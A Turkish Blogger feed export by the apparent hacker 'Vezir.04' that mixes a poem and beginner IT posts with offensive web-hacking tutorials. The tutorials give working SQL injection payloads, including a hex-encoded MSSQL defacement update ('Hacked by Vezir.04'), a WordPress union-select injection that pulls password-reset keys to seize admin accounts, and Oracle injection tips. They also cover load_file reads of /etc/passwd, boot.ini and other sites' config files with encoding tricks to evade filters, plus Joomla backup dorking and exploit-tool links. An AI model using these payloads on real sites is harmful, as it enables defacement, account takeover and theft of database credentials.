tag:blogger.com,1999:blog-48183812813392219212024-02-01T22:49:16.863-08:00Cannot be found nothing about hisVezir.04http://www.blogger.com/profile/02406787707276955003noreply@blogger.comBlogger18125tag:blogger.com,1999:blog-4818381281339221921.post-67688347585045791482013-02-06T22:40:00.003-08:002013-02-08T00:30:35.831-08:00<div class="mbl notesBlogText clearfix">
<div>
<span style="color: white;">İnsanlara kendimi zorla sevdiremeyeceğimi öğrendim.</span><br />
<span style="color: white;">Yapabileceğin tek şey sevilebilecek biri olmak.</span><br />
<span style="color: white;">Gerisi onlara kalmış...</span><br />
<span style="color: white;">Güven elde edebilmek için yılların gerektiğini,</span><br />
<span style="color: white;">Ama yok etmek için saniyelerin bile yettiğini öğrendim.</span><br />
<span style="color: white;">Önemli olanın hayatındaki eşyaların değil,</span><br />
<span style="color: white;">Hayattaki kişilerin olduğunu öğrendim.</span><br />
<span style="color: white;">Kendimi karşılaştırmak için başkalarının en iyi yaptıklarını değil,</span><br />
<span style="color: white;">Kendi en iyi yaptıklarımı kıstas almam gerektiğini öğrendim.</span><br />
<span style="color: white;">İnsanlar için olayların değil, onların daha önemli olduklarını öğrendim.</span><br />
<span style="color: white;">Her ne kadar ince kesersen kes,</span><br />
<span style="color: white;">Kestiğinin her zaman iki yüzü olacağını öğrendim.</span><br />
<span style="color: white;">Sevdiğin kişilere sevgi dolu sözler söylemen gerektiğini,</span><br />
<span style="color: white;">Belki bunun, onu son defa görüşün olabileceğini öğrendim.</span><br />
<span style="color: white;">Her ne kadar onu çok düşünsen de,</span><br />
<span style="color: white;">Yine de gidebileceğini öğrendim…</span><br />
<span style="color: white;">Kahramanların, yapılması gerekenleri ne pahasına olursa olsun,</span><br />
<span style="color: white;">Yapanlar olduğunu öğrendim.</span><br />
<span style="color: white;">İnsanların bana izin verdiğim biçimde davrandıklarını öğrendim.</span><br />
<span style="color: white;">Sinirlendiğimde gerçekten buna değse bile asla acımasız olmamam gerektiğini öğrendim.</span><br />
<span style="color: white;">Birisinin seni istediğin gibi sevmemesi,</span><br />
<span style="color: white;">Onun seni tüm benliğiyle sevmediği anlamına gelmediğini öğrendim.</span><br />
<span style="color: white;">Bir arkadaşın ne kadar iyi olursa olsun seni üzeceğini</span><br />
<span style="color: white;">Ve senin yine de onu affetmen gerektiğini öğrendim.</span><br />
<span style="color: white;">Bazen başkaları tarafından affedilmenin yetmediğini öğrendim.</span><br />
<span style="color: white;">Kendini de affetmeyi öğrenmelisin.</span><br />
<span style="color: white;">Kalbin ne kadar kırılmış olursa olsun,</span><br />
<span style="color: white;">Dünyanın senin acılarından dolayı durmayacağını öğrendim.</span><br />
<span style="color: white;">Her ne kadar verdiğim kadarını alamasamda her anlamda yine de şükretmeyi öğrendim.</span><br />
<span style="color: white;">Geçmişimiz ve durumumuzun olduğumuz kişiliği etkilediğini,</span><br />
<span style="color: white;">Ama olmamız gerekene karşı sorumlu olduğumuzu öğrendim.</span><br />
<span style="color: white;">İki kişinin tartışmasının, birbirlerini sevmedikleri anlamına gelmediğini öğrendim.</span><br />
<span style="color: white;">Ve tartışmadıkları zaman da sevdikleri anlamına gelmediğini…</span><br />
<span style="color: white;">Bazen kişiliğini eylemlerinin önüne koyman gerektiğini öğrendim.</span><br />
<span style="color: white;">İki kişinin tamamen aynı olan bir şeye baktıklarında bile,</span><br />
<span style="color: white;">Farklı şeyler görebildiklerini öğrendim.</span><br />
<span style="color: white;">Hayatlarında her zaman dürüst bir şekilde daha ileriye gitmek isteyen kişilerin,</span><br />
<span style="color: white;">Sonuçları önemsemediklerini öğrendim.</span><br />
<span style="color: white;">Seni doğru dürüst tanımayan kişilerin,</span><br />
<span style="color: white;">Hayatını birkaç saat içinde değiştirebileceklerini öğrendim.</span><br />
<span style="color: white;">Verebileceğin bir şey kalmadığında bile bir arkadaşın ağladığında,</span><br />
<span style="color: white;">Ona yardım edebilecek gücü bulabileceğini öğrendim.</span><br />
<span style="color: white;">Sevmeyi ve sevilmeyi öğrendim...</span><br />
<span style="color: white;">Ömür denilen şeyin, sanıldığından kısa olduğunu öğrendim.</span><br />
<span style="color: white;">Bir bardak su içmenin mutluluğunu hiçbir şeyle değişmemek gerektiğini öğrendim.</span><br />
<span style="color: white;">Acıların da sevinçler gibi insanı olgunlaştırdığını öğrendim.</span><br />
<span style="color: white;">İnsanın kalbinden hiç çıkmayacak kişiler olduğunu öğrendim.</span><br />
<span style="color: white;">Kalp kalbe karşı olmasa da her zaman,</span><br />
<span style="color: white;">Birini çok sevdiğinde, onun da bunu hissedeceğini öğrendim.</span><br />
<span style="color: white;">Dibini görmediğin suya dalmadığın gibi sonunu bilmediğin sevgiye de teslim olmamayı öğrendim...</span><br />
<span style="color: white;">'Belki
bir gün...' diye beklemenin senin hayatından giden yıllara malolduğunu
ve birgün onun sensiz ama gayet mutlu hayatıyla karşılaşmanın hiçte
imkansız olmadığını;</span><br />
<span style="color: white;">Herkesin kendisini sevenlere çektirdiklerini bir gün muhakkak en çok sevdiklerinden göreceklerini öğrendim.</span><br />
<span style="color: white;">Bazen insan ne kadar yakınsa istediğine,</span><br />
<span style="color: white;">O denli uzak olabileceğini öğrendim.</span><br />
<span style="color: white;">Ve ne zaman vazgeçmeye kalksa akıl,</span><br />
<span style="color: white;">Yüreğin o kocaman haliyle karşısına dikilmesi gerektiğini öğrendim.</span><br />
<span style="color: white;">Yüreğimin sesini dinlemem gerektiğini,</span><br />
<span style="color: white;">Ve yüreğimin aslında ‘sen’ olduğunu öğrendim.</span><br />
<span style="color: white;">Gerçek aşkın ihaneti asla affetmeyeceğini öğrendim.</span><br />
<span style="color: white;">Bir insanı ne kadar çok seviyorsan, o kadar da kolay nefret edebileceğini öğrendim.</span><br />
<span style="color: white;">Her ne kadar nefret etsen bile asla ona kıyamayacağını öğrendim.</span><br />
<span style="color: white;">Tutkunun ötesinde sevenler bir kez ‘kendine iyi bak’ derler ve giderler.</span><br />
<span style="color: white;">Onlar bu acıyı bir kezden fazla kaldıramayacaklarını bilirler.</span><br />
<span style="color: white;">İşte bu kadar sevebilecek kadar büyümüşse yüreğin,</span><br />
<span style="color: white;">‘Onun’ her zaman iyiliğini isteyeceğini öğrendim…</span><br />
<span style="color: white;">Kendine iyi bak deyip gidenlerin vardır elbet geçerli bir nedeni,</span><br />
<span style="color: white;">Savaşmadıkları için kızarsın ama suçlayamazsın,</span><br />
<span style="color: white;">Savaşmışlarsa yenildikleri için kızarsın ama suçlayamazsın,</span><br />
<span style="color: white;">Yenildiğin için kızarsın ama suçlayamazsın…</span><br />
<span style="color: white;">Gerçek aşkın kendini asla suçlatmayacağını öğrendim.</span><br />
<span style="color: white;">Herkesin her şeyi senden çok bildiğini öğrendim.</span><br />
<span style="color: white;">Tecrübenin ne kadar önemli olduğunu ama ne yaparsan yap,</span><br />
<span style="color: white;">Karşındakinin kendi tecrübesinden başka kimseninkinden faydalanmayacağını,</span><br />
<span style="color: white;">Hayatın bir tek yaşanılarak öğrenileceğini öğrendim.</span><br />
<span style="color: white;">Herkesin mutlu olmak için başka bir yolu olduğunu</span><br />
<span style="color: white;">Kendi yolumu çizdiğimde öğrendim.</span><br />
<span style="color: white;">Bir annenin çocuğunun kötülüğünü asla istemeyeceğini öğrendim.</span><br />
<span style="color: white;">Hayattaki en değerli varlığın, en büyük destekçinin,</span><br />
<span style="color: white;">Seni hesapsız kitapsız en çok sevecek kişinin ‘anne’ olduğunu öğrendim.</span><br />
<span style="color: white;">Bir annenin kalbi kırıldığında bütün meleklerin ağladığını öğrendim.</span><br />
<span style="color: white;">İnsanın sevdiğinin kıymetini ancak onu kaybettiğinde anladığını öğrendim.</span><br />
<span style="color: white;">Bir ilişki bir kere bitmişse eğer bir daha toparlamanın çok zor olduğunu öğrendim.</span><br />
<span style="color: white;">Gözyaşımı kahkahaya çevirdiğinde,</span><br />
<span style="color: white;">Ağlayanı güldürebilmenin ağlayanla ağlamaktan daha değerli olduğunu öğrendim.</span><br />
<span style="color: white;">‘Sana ihtiyacım var, gel!’ diyebilmekmiş güçlü olmak,</span><br />
<span style="color: white;">Sana ‘git’ dediğimde öğrendim.</span><br />
<span style="color: white;">Hayatta ‘o olmazsa yaşayamam’ dememeyi,</span><br />
<span style="color: white;">Hiçbir şeye öyle körü körüne bağlanmamak gerektiğini öğrendim.</span><br />
<span style="color: white;">Çok sevmezsen çok acımayacağını,</span><br />
<span style="color: white;">Çok sahiplenmeyince çok ait de olmayacağını öğrendim.</span><br />
<span style="color: white;">Hiçbir şeyin olmazsa hayatta,</span><br />
<span style="color: white;">Kaybetmekten de korkmayacağını öğrendim.</span><br />
<span style="color: white;">Hayatta insana her şeyi yaptıracak sadece iki duygu olduğunu öğrendim:</span><br />
<span style="color: white;">Aşk ve kıskançlık…</span><br />
<span style="color: white;">Gerçek dostlukların sonradan kazanılanlar değil,çocukluktan gelenler olduğunu öğrendim.</span><br />
<span style="color: white;">Her şeyin ilkini paylaştığın,</span><br />
<span style="color: white;">Karşındakinin kayıtsız şartsız ve çıkarsız kabul ettiği zamanın dostluklarıydı bunlar…</span><br />
<span style="color: white;">Yine de bitmeyecek dostluk diye bir şeyin olmadığını öğrendim.</span><br />
<span style="color: white;">İnsan ömür boyu mutlu olmak istiyorsa, sevdiği işi yapması gerektiğini öğrendim.</span><br />
<span style="color: white;">Birine
iyilik yap melek, birine doğruyu söyle köpek oluyorsun; iyilikler bir
saniyede unutuluyor da kötülüklerin ömür boyu unutulmadığını öğrendim.</span><br />
<span style="color: white;">İnsanların bahaneler bulup sırtını sevdiklerine dönmemeleri gerektiğini öğrendim,</span><br />
<span style="color: white;">O bahanelerin hiçbir zaman bitmeyeceğini de…</span><br />
<span style="color: white;">Zaman geçer, her şey biter, işte o zaman pişmanlıkların başladığını öğrendim.</span><br />
<span style="color: white;">Zamanın nasıl geçtiğini anlayabilen, onun hızına yetişebilen,</span><br />
<span style="color: white;">Hiç kimsenin olmadığını öğrendim.</span><br />
<span style="color: white;">İnsanların saniyelere dur demesi gerektiğini,</span><br />
<span style="color: white;">Kaybedilenlerin asla geri gelmeyeceğini öğrendim.</span><br />
<span style="color: white;">Hayatta aslında her şeyin nasıl da boş olduğunu öğrendim.</span><br />
<span style="color: white;">İnsanların ömür boyu sahip olduğu her şeyi tek saniyede kaybedebileceğini öğrendim.</span><br />
<span style="color: white;">İnsan herkese yakıştırıyor da ölümü, bir tek kendisine yakıştıramıyor.</span><br />
<span style="color: white;">Ölüm bana çok uzak sanıyor.</span><br />
<span style="color: white;">Herkesin yaşlanmadan ölmeyeceğini zannettiğini öğrendim.</span><br />
<span style="color: white;">Küçücük bir bebeğin cansız bedenini gördüğümde,</span><br />
<span style="color: white;">Azrail’in yaşı hesaba katmadığını öğrendim.</span><br />
<span style="color: white;">Sevdiklerini kaybetmekten korkuyor da insan,</span><br />
<span style="color: white;">Kendisinin sevdiklerini terk edeceğini hiç düşünmüyor.</span><br />
<span style="color: white;">Oysa ölümün sadece bir adım ötede olduğunu öğrendim.</span><br />
<span style="color: white;">Birde hayatta çok şey bildiğimi zannettiğimi,</span><br />
<span style="color: white;">Oysa öğrenmenin asla sonu olmadığını öğrendim…</span></div>
</div>
Vezir.04http://www.blogger.com/profile/02406787707276955003noreply@blogger.com1tag:blogger.com,1999:blog-4818381281339221921.post-50011520895277557012012-12-21T11:53:00.003-08:002012-12-21T11:53:16.711-08:00İşletim Sistemi Nedir?
İşletim sistemi bilgisayar donanımını yöneten ve hükmeden yazılım bütünüdür. İşletim sistemi donanımları yönetip bizim bilgisayarda işlem yapmamızı sağlar. Bilgisayarda yapılan bütün işlemler aslında makine dilinde 0 ve 1 den ibarettir. İşletim sistemi bu yaptığımız işlemleri bilgisayar donanımın anlayacağı şekle getirir.
Günümüzde en çok kullanılan işletim sistemleri:
Microsoft Windows:
Günümüzde en yaygın işletim sistemidir. Kullanıcı dostu olduğundan dolayı ve programların hepsi Windows işletim sisteminde çalıştığından tercih edilir.
Linux:
Açık kaynak kodlu bir yazılımdır. Genelde server olarak kullanılır. Windows işletim sisteminden daha performanslı çalışır. Güvenlik açıkları daha azdır ve kişiler kendi isteklerine göre işletim sistemini geliştirebilir.
Mac OS X:
Apple firmasının işletim sistemidir. Genel olarak grafik çalışmaları yapanların tercih ettiği bir işletim sistemidir. Grafik çalışmalarında en iyi performans veren işletim sistemidir. Donanım sistemi yüksek olduğundan dolayı pahallıdır ve bu yüzden çok fazla tercih edilmez.
Android:
Google firmasının Linux tabanından geliştirmiş olduğu mobil işletim sistemidir.
iOS:
Apple firmasının mobil işletim sisitemidir.
MS Dos:
Windows işletim sistemi öncesinde kullanılan işletim sistemidir. Fare kullanımı yoktur sadece klavye ile komut yazılarak işlem yapılır.
İşletim Sistemi Tarihi:
İlk Bilgisayar 1940 lı yıllarda askeri alanda kullanılmaya başlanmıştır. Özel amaçlı kullanılan delikli kartları kontrol için kullanıldı. Vezir.04http://www.blogger.com/profile/02406787707276955003noreply@blogger.com0tag:blogger.com,1999:blog-4818381281339221921.post-70973219357387575662012-12-21T11:51:00.001-08:002012-12-21T11:56:58.185-08:00Veri tabanı yönetim sistemleri nedir? Veri tabanı yönetim sistemi ingilizce olarak "Database Management Systems" olarak geçer
.<br />
<br />
Veri tabanını bir bilgi kümesi olarak düşünebiliriz. Veri tabanın kullanılmasının sebebi kendi içeresinde olan veri tabanı motoru sayesinde bilgiye daha hızlı ulaşılmasıdır. Veri tabanında metin veya grafik saklayabiliriz.<br />
<br />
Ama grafik (Resim) saklamak mantıklı değildir. Boyutunun büyük olması veri tabanını yorar ve böylece işlemci ve rame büyük yük gelir.<br />
<br />
Temel SQL komutları:<br />
Insert = veri girişi komutu<br />
Update = veri düzenleme komutu<br />
Delete = veri silme komutu
Veritabanın<br />
<br />
Genel Olarak Yapısını oluşturan işlemler:
Veri tabanı motoru
Veri depolama altsistemi
Veri sorgulama alt sistemi
Veri tanımlama alt sistem
Uygulama geliştirme alt sistemi
Veri tabanı yönetim alt sistemi<br />
<br />
En Çok Kullanılan Veritabanları:<br />
MySQL<br />
PostgreSQL<br />
Oracle<br />
Sybase<br />
MsSQL<br />
Berkeley<br />
Firebird<br />
Ms access Vezir.04http://www.blogger.com/profile/02406787707276955003noreply@blogger.com0tag:blogger.com,1999:blog-4818381281339221921.post-30794888903696624412012-06-04T10:22:00.002-07:002012-06-04T10:42:14.279-07:00Update'nin filtreli olduğu sitelerde declare kullanımıÖncelikle herkese merhaba her zaman söze başladığım gibi bu seferde aynısını söylemeyeyim zaman yok diye.Zaman var ama o
zamanlarda farklı işlerle uğraştığım için pek ilgilenemiyorum blogla.Zaten web güvenliği işinide eskisi gibi pek takip etmiyorum
fırsat buldukça bir şeyler paylaşmayada devam edecem .Takip eden yoktur belki ama yinede bir gün birinin işine yarar diye blogu
açık tutuyorum.
Şimdi Mssql veritabanlı bir sistemde update filtreliyse o zaman declare kullanarak update yapmayı deneyebilirsiniz.
http://localhost/url.asp?id=1 and 1=declare @something nvarchar(500) set @something=0x7570646174652B6E6577735F6974656D2B7365742B5469746C653D274861636B65642062792056657A69722E3034272D2D;exec @someting;--
update+news_item+set+Title='Hacked by Vezir.04'-- alttaki kodlar bunun şifrelenmiş hali.
7570646174652B6E6577735F6974656D2B7365742B5469746C653D274861636B65642062792056657A69722E3034272D2D
update+tablo adi+set+kolon adi='Hacked by Vezir.04'-- bu kısma tablo kolon isimlerini yazıp hex ile şifreleyip yolluyoruz.
Bir daha ki sefere görüşmek üzere.Vezir.04http://www.blogger.com/profile/02406787707276955003noreply@blogger.com1tag:blogger.com,1999:blog-4818381281339221921.post-36670944290783065012012-03-04T08:37:00.002-08:002012-03-04T08:44:37.043-08:00Post mssqlPost mssql yaparak update yaparak panele girmeyi anlattım.<br /><br /><br />http://www.4shared.com/rar/Ye0HjQUq/postmssqlinjection.htmlVezir.04http://www.blogger.com/profile/02406787707276955003noreply@blogger.com0tag:blogger.com,1999:blog-4818381281339221921.post-11710615172460492312012-02-27T07:31:00.003-08:002012-02-27T07:50:47.402-08:00Wordpress şifre sıfırlama.Merhaba bügün size wordpress'de şifre sıfırlamayı anlatacam.<br /><br />Normalde Wordpress sql injection'da user_login,user_pass kolonlarından bilgileri çekeriz . Ama wordpress şifre algoritması olarak portable php password hashing framework kullandığı için bunu kırmak biraz zordur.<br /><br />Bu şekilde md5 kırma yerine admin mailine aktivasyon kodu göndererek şifre sıfırlamayı nasıl yaparız.<br /><br />örneğin ;<br /><br />http://hedef.com/?p=-99999/**/union/**/select/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/from/**/wp_users/*<br /><br />Şimdi bizim aktivasyon kodunu alabilmemiz için ilk önce şifreyi unuttum deyip admin mailine aktivasyon<br /><br />kodunu yollatmamız lazım.<br /><br />http://hedef.com/wp-login.php?action=lostpassword<br /><br />burdan admin adını yada mailini yazıp aktivasyon kodunu yollamasını istiyoruz.<br /><br />Ardından user_pass isimli kolon yerine user_activation_key kolonun yazıp aktivasyon kodunu alıyoruz <br /><br />http://hedef.com/?p=-99999/**/union/**/select/**/concat(0x7c,user_login,0x7c,user_activation_key,0x7c)/**/from/**/wp_users/*<br /><br /><br /><br /><br />user_login : security <br /><br />user_activation_key : CDFSAlCsTUvBDUMGHTcd<br /><br />bu şekilde admin ve şifreyi değiştirmek için işimize yarayacak olan aktivasyon kodunu alıyoruz .<br /><br />wp-login.php?action=rp&key=[Aktivasyon kodunu buraya ]&login=[Kullanici adinida buraya ]<br /><br />wp-login.php?action=rp&key=CDFSAlCsTUvBDUMGHTcd&login=security<br /><br />bu şekilde yaptığımızda yeni şifrenizi yazıp admin olarak giriş yapacaksınız.<br /><br /><br />Not: Eğer ki aktivasyon kodu yollamadan aktivasyon kodu çekmeye çalışırsanız daha önceden aktivasyon<br /> <br />kodu yollanmadığı için " Can not get Length of 'Column Data' " yazar bunun içinde öncelikle<br /><br />şifremi unuttum diyip aktivasyon kodunu yollayın.Vezir.04http://www.blogger.com/profile/02406787707276955003noreply@blogger.com0tag:blogger.com,1999:blog-4818381281339221921.post-70243029431842723742012-02-17T04:14:00.005-08:002012-02-17T04:37:33.694-08:00Http ve Https Arasindaki FarkMerhaba arkadaşlar uzun süredir pek ilgilenmiyorum .İş , okul derken pek zaman kalmıyor.<br />Bügün size aslında internete her girdiğimizde gördüğümüz ama ne işe yaradığını bilmediğimiz http ve https arasındaki farkı açıklamaya çalışacam . <br /><br />Https (Hyper Text Transfer Protocol Secure) genel olarak banka sistemleri , kredi kartı ile alışveriş yapılan ve diğer güvenliğine önem veren firmalara tarafından yaygın olarak kullanılır . Çünkü https de giriş yaptığınızda bilgileriniz sizin ve giriş yaptığınız adres tarafından okunabilecek şekilde şifrelenir.Http de ise böyle bir şifreleme yoktur.Sizin giriş yaptığınız verilere başka kişiler ulaşabilir .<br /><br />Ek olarak eklemek isteyeceğim bir şey daha var .Dün gece Ttnet borcunu ödemeyi unuttuğum için internet bağlanmaya çalıştığım zaman ttnet borç ödeme ekranına yönleniyordu . http://siteadi.com/ diye siteye bağlanmaya çalıştığım zaman ttnet borc ödeme ekranı çıkıyordu .http:// yerine https://siteadi.com/ diye girdiğim zaman ttnet borc ödeme ekranı çıkmadan rahatlıkla internete bağlanabiliyorsunuz .<br />Bir daha ki sefer görüşmek dileğiyle .Vezir.04http://www.blogger.com/profile/02406787707276955003noreply@blogger.com1tag:blogger.com,1999:blog-4818381281339221921.post-81483757551796485602011-07-30T01:51:00.000-07:002011-07-31T00:15:05.478-07:00Oracle'de püf noktalarOracle'de sql kasmak isteyenler için bir kaç püf noktaya değinecem ; oracle da veri tipleri uyuşmadığından null,null diye başlarsıniz.<br /><br />from all_tables dersiniz information_schema.tables karşılığıdır<br /><br />from kullanmadan select çekemezsin<br /><br />all_tab_columns < bu da information_schema.columns karşılığı<br /><br />table_name column_name kolon adları aynı<br /><br /><br />union select version from all_Tables veya union select user from all_Tables<br /><br />diye deneme yapcaksıniz geri döndürüyosa char kolonu tutturmuşsunuz<br /><br />yoksa blind kasarsıniz sonra tabloları kullanıcına göre çekmek istiyosaniz where owner=user diceksiniz<br /><br />all_tables tan table_name çekersen yetki olan tüm tablo adlarını verir<br /><br />ama sonra onları doğrudan from tablo şeklinde çekebilmeniz için çektiğiniz tablonun kendi kullanıcı adında olması lazm<br /><br />yoksa owner ını da çekip başına misal from KULLANICI.TABLO yazarsıniz bi de oracle da tüm tablo kolon adları büyük harftir<br /><br />sistem tabloları hariç<br /><br />Oracle'de hex kullanılmaz chr (ascii tablosu) kullanilir<br /><br /><br />birleştirme yapmak için<br /><br />mysql de concat()<br />mssql de +<br />oracle da ||<br />postgre de ||<br />kullanılır<br />birleştirme yapmak için<br />misal<br />union select AD||'|SOYAD from OGRENCI<br />misal<br />322 union select null,null,AD||' '||SOYAD||'|MESLEK||'|SIFRE,null,null,null,null,null,null from DURUM.PERSONEL where AD='YASİR'<br /><br />mesela yazıyı charlayıp yollayacaksanız <br /><br />char(42)+char(352)<br /><br /><br />bu şekilde ama url den get ile gönderdiğinde + lar boşluk algılanır o yüzden<br /><br />char(42)%2bchar(352)<br /><br />şeklinde yazacaksıniz %2b + nın karşılığıdır<br /><br />Bügünlük bu kadar yeter Bir dahaki sefere de oracle'de like kullanımını anlatacam.<br /><br />Agd_Scorp'da burda teşşekürlerimi iletiyorum.Vezir.04http://www.blogger.com/profile/02406787707276955003noreply@blogger.com1tag:blogger.com,1999:blog-4818381281339221921.post-66791050648936236792011-07-03T01:00:00.000-07:002011-07-03T01:09:52.953-07:00Joomla sql yedeklerine ulaşmak.Bu yöntemle google üzerinden arama yaparak joomla kullanan sitelerin sql yedeklerine nasıl ulaşılır onu gösterecem.<br /><br /><br /><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgnPXUmWaMddGVZbQkjGIDJvdXeZaT7LQZhSFmPSQvqAQMV6jDk9GepfyRvjtqSbhGV1fyuQXWw_ePDq6_ZJyLamrmloS_dTS2ABOhOtaLFg-6VNWf1hViCGXg2VMBfb_VWw1A6j0AnqS0/s1600/joomla_sql_md5_1.jpg"><img style="float:left; margin:0 10px 10px 0;cursor:pointer; cursor:hand;width: 714px; height: 141px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgnPXUmWaMddGVZbQkjGIDJvdXeZaT7LQZhSFmPSQvqAQMV6jDk9GepfyRvjtqSbhGV1fyuQXWw_ePDq6_ZJyLamrmloS_dTS2ABOhOtaLFg-6VNWf1hViCGXg2VMBfb_VWw1A6j0AnqS0/s1600/joomla_sql_md5_1.jpg" border="0" alt="" /></a><br /><br />Şekil 1: <br /><br /><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjgRe5oUyxjsNEe6tXyVfcdz96qXPvUD_L0jWrWMtz20Wmq6iFE6sN_QIJlXNTBRhbbRn9ewrOWoMSGaUGO8BvjlsIIJYu1B-KvgK5bTwyagxw6XWRwoy6rkgbmtqhANDFTEW8Jxi3x5UE/s1600/joomla_sql_md5_2.jpg"><img style="float:left; margin:0 10px 10px 0;cursor:pointer; cursor:hand;width: 753px; height: 138px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjgRe5oUyxjsNEe6tXyVfcdz96qXPvUD_L0jWrWMtz20Wmq6iFE6sN_QIJlXNTBRhbbRn9ewrOWoMSGaUGO8BvjlsIIJYu1B-KvgK5bTwyagxw6XWRwoy6rkgbmtqhANDFTEW8Jxi3x5UE/s1600/joomla_sql_md5_2.jpg" border="0" alt="" /></a><br /><br />Şekil 2: <br /><br /><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhzq_ZBB-qhX2nyWm1EN-dsNenfG19vFUtRKNK-JjbwdAWRTjRLQA2Pop2TYnPRd8Oh0R3CJznjsiEfsVdKwhc87wBXkSZYeBs34mOHU1svYYwVA768zrRHJa2tMrzmGS4Z5VVRsVZhKNo/s1600/joomla_sql_md5_3.jpg"><img style="float:left; margin:0 10px 10px 0;cursor:pointer; cursor:hand;width: 682px; height: 135px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhzq_ZBB-qhX2nyWm1EN-dsNenfG19vFUtRKNK-JjbwdAWRTjRLQA2Pop2TYnPRd8Oh0R3CJznjsiEfsVdKwhc87wBXkSZYeBs34mOHU1svYYwVA768zrRHJa2tMrzmGS4Z5VVRsVZhKNo/s1600/joomla_sql_md5_3.jpg" border="0" alt="" /></a><br /><br />Şekil 3:Vezir.04http://www.blogger.com/profile/02406787707276955003noreply@blogger.com0tag:blogger.com,1999:blog-4818381281339221921.post-72724899078534255512010-11-25T08:59:00.000-08:002010-11-25T09:03:03.286-08:00osCommerce Online MerchantMerhaba arkadaşlar bügün size osCommerce Online Merchant sistemindeki açık için kodlanmış programın kulanımını anlatmaya çalıştım.Video yu izleyin anlamadığınız yer olursa söylersiniz <br /><br />http://osc.eclass.tw/images/vezir.rarVezir.04http://www.blogger.com/profile/02406787707276955003noreply@blogger.com1tag:blogger.com,1999:blog-4818381281339221921.post-5303344988628210212010-10-18T12:27:00.000-07:002011-07-15T03:07:33.209-07:00Hacking AnatomiHerhangi bir sitede SQL tespit ettigimizi varsayalım ,<br />Aslında amacımız bu sitedekı SQL zaafiyatını kullanarak serverdaki diger sitenin<br />db’sine erismek. Burda MySQL’in uzaktan istege acık oldugunu + serverin Linux dagıtımlarından birini kullandıgını varsayıyorum.<br />Yapacagımız ilk is MySQL Sorgularını , kurbanın sitesinde servera isletmek olcaktır.<br /><br />**********<br />ozn.php?id=1+and+1=1 yaptığımızda 1=1 olduğundan true döner<br /><br />ozn.php?id=1+and+1=2 yaptığmızda ise 1=2 olmadığı için true dönmez yani yanlışlığı algılar ve hata verir şimdi kolon sayısını<br /><br />öğreniyoruz<br /><br />ozn.php?=1order+by+6-- <br /><br />*yaptık sayfa hata verdi<br /><br /><br />ozn.php?id=1+order+by+7–- <br /><br />*bu şekil yaptık sayfa hata vermeden açıldı<br /><br />* kolon sayısını ogrendik 7<br /><br />ozn.php?id=1/**/union/**/select/**/0,1,2,3,4,5,6,7/*<br /><br />3 4<br /><br />* Kolon sayısınının esit oldugunu soyluyor.<br /><br />ozn.php?id=-1+union+select+0,1,2,load_file(/etc/passwd),4,5,6,7/* < Linux All<br /><br />*Linux da “userler”in yetkılerıne temelli sahibiz,<br /><br />*Windows icin de aynı sey gecerlidir.<br /><br /><br /><br />* Eger Makina Windows olsaydı..<br /><br />boot.ini‘yi okuyabiliriz , engel varsa hexleriz.<br /><br />select ‘c:/boot.ini’<br /><br />select 0×633a2f626f6f742e696e69 <br /><br />Domainler ” C:/Inetpub ” burada.<br /><br />ozn.php?id=-1+union+select+0,1,2,load_file(0×633a2f626f6f742e6 96e69),4,5,6,7/*<br /><br /><br /><br />Blind Edebiliriz !<br /><br />substring(load_file(’c:/boot.ini’),58) <br /><br />” [boot loader] timeout=30 default=multi(0)disk(0)rdisk(0)partition(2)\WINDOW S …”<br /><br /><br /><br />Windows icinde asagıda goreceginiz teknıkler birebir aynıdır.. Extra uzerınde durmaya gerek yok.<br /><br />Simdi konumuza geri donelım;<br /><br />*Kullanıcı adı ve dizinlerin bulundugu yerı ogrenmem icin etcleri listelemem gerekli.<br />Eger bunu yapamazsanız servera hata verdirip ana dizin yolu ogrenebilirsiniz; ama bu sadece uzerinde calıstıgımız<br />site icin gecerli olacaktır.<br /><br />Bu tip karakterlerin(’,-) serverda islemedigi durumlarda kurdugumuz sorguları hexleriz veya ascii koda cevirip sorguya<br />dahil ederiz.<br />Neden bu karakterle pasif olur peki ?<br />php.ini deki “magic_quotes_gpc” direktifinin “On” olmasıdır. Dolayısyla numerik dısında gelen sayıları ters slash’a “\,/”<br />cevirecektir.<br /><br />Calısma mantıgı ,<br /><br />(int) , intval(GET),POST,COOKİE) , addslashes() ile aynı isleve sahiptir.<br /><br /><br /><br />- UYGULAMA - <br /><br />/**/union/**/select/**/0,1,2,load_file(/etc/passwd),4,5,6,7/*<br /><br />Eger engel varsa ;<br /><br />> > ozn.php?=88888881 union select 0,1,2,unhex(hex(/etc/passwd),4,5,6,7 <br /><br />// Serverda ki tüm kullanıcı adları ve konumlandıgı klasörler karsımızda.<br /><br />Target “ozn"<br /><br />/home/ozn/httpdocs:<br />/home/site/httpdocs:<br /><br /><br /><br />Amacımız ozn adlı kurbanın dbsini ele gecirmek , Bunun icin ozn adlı hedefin<br />db bilgilerinin saklandıgı dosyayı bulmak gereklı , genelde “config.php” , main.php , common.php olur<br />Uzamasın diye kısaltalım biraz “httpdocs” adlı klasorde “main.php” oldugunu varsayıyorum<br />soyle bir ıstekde bulunuyorum ;<br /><br />/**/union+select+0,1,2,load_file(/home/victim2/httpdocs/main.php),4,5,6,7/* <br /><br />* Burada gene hexleyecegız parantez icindekı karakterleri.<br /><br />/**/union/**/select/**/0,1,2,load_file(0×2F686F6D652F76696374696D322F6874 7470646F63732F6D61696E2E706870),4,5,6,7/*<br /><br /><br /><br />Syntax Hataları ve Çözümleri<br /><br />Alternatif durumlar da goreve dahil ettigimiz MySQL katarları : “char” , “concat” , “blob” , “varchar” …<br /><br />Serverda ” magic_quotes_gpc = On ” direktifi aktif oldugunda ;<br /><br />ozn.php?id=88888881 union select 0,1,2,3,4,5,6,7 <br /><br />3 4<br /><br />/home/victim2/httpdocs/main.php < Go to ascıı code converted<br /><br />ozn.php?=88888881 union select 0,1,2,load_file(char(/home/ozn/httpdocs/main.php))),4,5,6,7 <br /><br />ozn.php?=88888881 union select 0,1,2,load_file(concat(char(47,104,111,109,101,47, 118,105,99,116,105,109,50,47,104,116,116,112,100,1 11,99,115,47,109,97,105,110,46,112,104,112)))),4,5 ,6,7<br /><br /><br /><br /><br />“information_schema” 